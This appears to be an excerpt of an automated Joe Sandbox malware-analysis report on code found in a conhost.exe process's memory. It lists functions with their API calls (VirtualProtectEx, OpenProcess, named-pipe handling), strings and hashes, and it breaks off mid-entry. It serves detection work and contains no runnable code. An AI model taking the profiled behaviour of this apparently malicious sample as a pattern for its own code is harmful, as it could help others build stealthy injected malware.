API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 9a0670d5bb27f0a405a7799c0e5323d1cb8b44489e289d539b73573c6f5dc72b
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 07014C75211B4083FB649FB1F88879A73B0BB49B56F048428CA4D067A6EF3DC568E700

Function 000001B444901AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001B444901AF4
StrCmpNIW.SHLWAPI ref: 000001B444901B0E
lstrlenW.KERNEL32 ref: 000001B444901B1D
StrCpyW.SHLWAPI ref: 000001B444901B32

Strings

\\?\, xrefs: 000001B444901B02

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 283f8cc3a8c87e14c21121bb79628bf3605a41bef8c4d280fd38f3bc3230c3a3
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 41F08C3230468593FB608F30E4C43997370F744B9AFC880218A494395ADF6CC6A9EB00

Function 000001B44490B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001B44490B929
GetProcAddress.KERNEL32 ref: 000001B44490B93F
FreeLibrary.KERNEL32 ref: 000001B44490B95B

Strings

CorExitProcess, xrefs: 000001B44490B938
mscoree.dll, xrefs: 000001B44490B920

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 2ba69fc81f8d1a7efd74922c803878e5f534b4e53b088e33000da47cd330a2cd
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 6FF0903130070183FA109B74A8D43A93330EB897A6F948619DA7A455E6CF2CC868E300

Function 000001B444903708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001B44490275A), ref: 000001B44490372A
StrCpyW.SHLWAPI ref: 000001B44490373A
StrCatW.SHLWAPI ref: 000001B444903746
PathCombineW.SHLWAPI(?,?,00000000,000001B44490275A), ref: 000001B444903754

Strings

\\.\pipe\, xrefs: 000001B444903720

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 4dd9876b67fb66ffe7030ac637560582cf87d021883f419459b7d3cbd3f236a4
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 0FF05E74304B80C3FA548B22B994399B271AB48FD2F85C030EE0A47B1ACF68C4669700

Function 000001B444905810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001B444905896

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: b0278c8bbeff3a9097095d0c2d50857d3d2d891ba2264f3e07030325f09aaa59
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 1B02BA32619B8487EBA0CB65F49439AB7B0F3C5794F108515EA8E87BA9DF7CC494DB00

Function 000001B444902C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001B444902CAD
TlsGetValue.KERNEL32 ref: 000001B444902CBC
TlsGetValue.KERNEL32 ref: 000001B444902CCB
TlsSetValue.KERNEL32 ref: 000001B444902E0F
TlsSetValue.KERNEL32 ref: 000001B444902E1E
TlsSetValue.KERNEL32 ref: 000001B444902E2D

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 8f425c4760230b8c8f10896b501adcd845f0fd49da0b5628d8844cbc2096daa7
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 4B518D3660460187E768CF26E484B9AF3B4F788B95F50C129DE4A43B96DF38CD65EB40

Function 000001B444902AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001B444902AE1
TlsGetValue.KERNEL32 ref: 000001B444902AF0
TlsGetValue.KERNEL32 ref: 000001B444902AFF
TlsSetValue.KERNEL32 ref: 000001B444902C3B
TlsSetValue.KERNEL32 ref: 000001B444902C4A
TlsSetValue.KERNEL32 ref: 000001B444902C59

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 8456aa404c774c0ce7be695777772141b0c3f8dde9f30acb09dc1ae5f30099b6
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 3B51C2366146118BE768CF36A8C07AAF3B0F389B94F508119DE4A43B56DF38CC65EB00

Function 000001B444905E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001B444905E66

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 7c386e532fd6983e1499a13ab14bc231aabfa423f46f7af91cbe00d15f689779
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: DC61B536529A4487EBA0CB25E49439AB7F0F389754F108515EB8D87BAADF7CC960DB00

Function 000001B444903EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001B444903A5B), ref: 000001B444903EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001B444903A5B), ref: 000001B444903F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001B444903A5B), ref: 000001B444903F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001B444903A5B), ref: 000001B444903F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001B444903A5B), ref: 000001B444903F68

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 12eb9393d36c1c82e993ab5efa59fe6913471b98c92cea11a93e472aae6ad46e
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 2A112B3660574093FB648F71E48439AB7B0FB44B90F048126DA4D037A9EF7DCAA4E784

Function 000001B444908CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001B444908CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001B444908D62
RtlUnwindEx.NTDLL ref: 000001B444908DBC

Strings

csm, xrefs: 000001B444908D49

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 0a59dee83ef76972b153bf68bdff444e980a9e13dcc64f490f6e8dc391468399
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: A151B132311A008BEB54DF35E488BAD77B2F754B98F55C225EA4A4778ADF78C8A1D700

Function 000001B44490A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001B44490A75B
_CallSETranslator.LIBVCRUNTIME ref: 000001B44490A7A7

Strings

MOC, xrefs: 000001B44490A76F
RCC, xrefs: 000001B44490A777

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 4d7fa3ff1c55e7d11edecb0dbff43d458775668bfaf2115de031d1ef62969744
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 3C617D72508BC486EB719F25E4807DAB7B0F795B98F048215EB9817B9ADF7CC1A4CB40

Function 000001B44490AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001B44490AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001B44490ABBC

Strings

csm, xrefs: 000001B44490AC0E
csm, xrefs: 000001B44490AAF6

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: ed3e1f076fc794b0d4bedb828b7ad1e032aab119227b77dbf7757d7c321e2834
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 51516B322006808BEB748F36958439877F1F3A4B94F15C116DA9A47BD6CF38C871EB81

Function 000001B4448A9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001B4448A9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001B4448A9FBC

Strings

csm, xrefs: 000001B4448AA00E
csm, xrefs: 000001B4448A9EF6

Memory Dump Source

Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: b75eac124a33b474eed7283a55608b0d633c6a2747dc3a7694d2ff655d208241
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 4A51593A204680CBEF749F66E54439877A0FB54B94F188116DF9967BD6CFB8C8A0CB01

Function 000001B444903950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001B444903972
StrStrW.SHLWAPI ref: 000001B444903990
StrToIntW.SHLWAPI ref: 000001B4449039B7

Part of subcall function 000001B444901A30: OpenProcess.KERNEL32 ref: 000001B444901A56
Part of subcall function 000001B444901A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001B444901A74
Part of subcall function 000001B444901A30: PathFindFileNameW.SHLWAPI ref: 000001B444901A83
Part of subcall function 000001B444901A30: lstrlenW.KERNEL32 ref: 000001B444901A8F
Part of subcall function 000001B444901A30: StrCpyW.SHLWAPI ref: 000001B444901AA2
Part of subcall function 000001B444901A30: CloseHandle.KERNEL32 ref: 000001B444901AB0

Part of subcall function 000001B444903F88: StrCmpNIW.SHLWAPI(?,?,?,000001B44490272F), ref: 000001B444903FA0

Strings

pid_, xrefs: 000001B444903968

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 233a89adcb7caedc3f1094f6f9f0ea54760a9c961a63ed657bc5fbb05b573c0e
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: B7119031310B81A3FB609B35E8C53DA73B4F788781F808525AE4DC3696EF68C925E740

Function 000001B444911FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001B444912027
WriteFile.KERNEL32 ref: 000001B444912304
WriteFile.KERNEL32 ref: 000001B44491234A
GetLastError.KERNEL32 ref: 000001B444912409

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 1c93df4d6d6ad14a80e251e24f09266ac414c054c0cd4a6b966a82b71e62c454
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: F4D19632B14A848AE715DFB9E4803EC77B1E354B99F408216DE5EA7B9ADB34C126D340

Function 000001B4449014A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001B4449014C6
HeapFree.KERNEL32 ref: 000001B4449014D5
GetProcessHeap.KERNEL32 ref: 000001B4449014E2
HeapFree.KERNEL32 ref: 000001B4449014F1
GetProcessHeap.KERNEL32 ref: 000001B444901501

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: dc34c2d1bafdbc337168bd19e30c4f2fd19839b9c20b03aed3ebf615c8f26c58
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 97016532610B80DBE755DF66E88468977B0F788F96B0A8025DF4943729DF38D0A1C740

Function 000001B4449128F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001B4449128DF), ref: 000001B444912A12

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: bfd8b86fbcb29e86e32dfb92e64d714f680631888555c4906467a73b2609835b
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 0991FF327106548AFB68EF7594D07EDBBB0F345B99F44810ADE4A63A86DF34C4A6E300

Function 000001B4449027E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001B4449028CC
StrCpyW.SHLWAPI ref: 000001B4449028E5

Part of subcall function 000001B444903F88: StrCmpNIW.SHLWAPI(?,?,?,000001B44490272F), ref: 000001B444903FA0

Strings

\\.\pipe\, xrefs: 000001B4449028D7

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 18fd61f098f2acc001e682e0c21f882e1c0543038f2da1e051d9740efd933a0c
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 5871B236204B8147EB79DE36A9C43EAB7B4F385B84F508016DD4A53B8ADF35CA20E740

Function 000001B4448A80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001B4448A80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001B4448A8162

Strings

csm, xrefs: 000001B4448A8149

Memory Dump Source

Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 43d9f1e0f9c52bcebd4199a47ce63a48eb9ac4625a3a36bde71eed85cd819832
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: DB51B03A311E088BEF54CB15E448BAC33A1FB44B98F15C525EA4A577CAEFB8C861C710

Function 000001B4448A9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001B4448A9BA7

Strings

